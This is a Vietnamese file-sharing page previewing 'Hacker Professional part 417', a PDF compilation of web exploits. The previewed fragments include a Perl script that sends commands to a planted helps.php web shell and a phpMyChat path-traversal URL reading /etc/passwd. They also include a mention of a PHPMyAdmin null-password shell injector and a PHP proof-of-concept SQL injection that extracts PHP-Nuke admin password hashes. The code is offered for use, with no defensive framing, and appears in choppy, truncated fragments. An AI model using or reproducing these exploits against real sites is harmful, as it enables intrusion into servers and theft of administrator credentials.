intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Hacker Professional part 417

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:5

50
lượt xem
6
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 417', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:
Lưu

Nội dung Text: Hacker Professional part 417

  1. $cmd = URLEncode($cmd); $cmd .= "\r\n"; #I know it look stupid, But trust me. it works better this way. $http = $ARGV[1]; $http .= "helps.php?c="; $http .= $cmd; $socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"[-] Couldn't connect!\n"; httpcon($socks,"GET",$ip,$http,"!"); while($ans = ){ if(($ans =~ /(.*)/)) { print $1; $allow = 0; } if($allow == 1){ print $ans;} if(($ans =~ /(.*)/)) { if($1 eq //){ print $1;} $allow = 1; } } $allow = 0; $ans = 'AN';
  2. } PHPMyAdmin Null Password Sheel Injector. Navaro(HCE) bPhpMyChat
  3. Key [:] ChatPath=[file] Example: http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/pass wd Black_hat_cr(HCE) phpMyConferences
  4. # THANKS: Milw0rm,str0ke, google.... # # ############################################### Black_hat_cr(HCE) PHPMyNews 1.4
  5. $host="localhost"; $path="/phpnuke/"; $prefix="nuke_"; $port="80"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1"; if ($fp) { $p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n"; $p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n"; $p.="Referer: http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n"; $p.="Accept-Language: es-ar\r\n"; $p.="Content-Type: application/x-www-form-urlencoded\r\n"; $p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $p.="Host: localhost\r\n"; $p.="Content-Length: ".strlen($data)."\r\n"; $p.="Pragma: no-cache\r\n"; $p.="Connection: keep-alive\r\n\r\n"; $p.=$data; fwrite($fp, $p); while (!feof($fp)) { $content .= fread($fp, 4096); } preg_match("/([a-zA-Z0-9]{32})/", $content, $matches); print_r($matches); } // ==Real Proof of Concept exploit==
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2